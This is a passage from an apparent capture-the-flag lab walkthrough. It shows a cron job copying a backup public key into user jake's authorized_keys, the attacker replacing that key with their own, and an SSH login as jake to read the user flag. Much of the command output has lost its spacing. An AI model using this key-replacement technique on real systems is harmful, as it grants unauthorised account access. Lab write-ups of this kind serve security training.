There was a cron job which was copying the backup key to jake's authorized keys:
www-data@smag:/$cat/etc/crontab# /etc/crontab: system-wide crontab# Unlike any other crontab you don't have to run the `crontab'# command to install the new version when you edit this file# and files in /etc/cron.d. These files also have username fields,# that none of the other crontabs do.SHELL=/bin/shPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin# m h dom mon dow user command17****rootcd/&&run-parts--report/etc/cron.hourly256***roottest-x/usr/sbin/anacron|| ( cd/&&run-parts--report/etc/cron.daily )476**7roottest-x/usr/sbin/anacron|| ( cd/&&run-parts--report/etc/cron.weekly )5261**roottest-x/usr/sbin/anacron|| ( cd/&&run-parts--report/etc/cron.monthly )***** root /bin/cat /opt/.backups/jake_id_rsa.pub.backup > /home/jake/.ssh/authorized_keys
Jake's Login
Now generate a key pair and replace the public key with the newly generated key.
Login using the private key:
$ssh-i~/.ssh/id_rsajake@10.10.171.199Theauthenticityofhost'10.10.171.199 (10.10.171.199)'can't be established.ECDSA key fingerprint is SHA256:MMv7NKmeLS/aEUSOLy0NbyGrLCEKErHJTp1cIvsxnpA.Are you sure you want to continue connecting (yes/no/[fingerprint])? yesWarning: Permanently added '10.10.171.199' (ECDSA) to the list of known hosts.Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-142-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantageLast login: Fri Jun 5 10:15:15 2020jake@smag:~$ whoamijakejake@smag:~$ lsuser.txtjake@smag:~$ cat user.txt <REDACTED>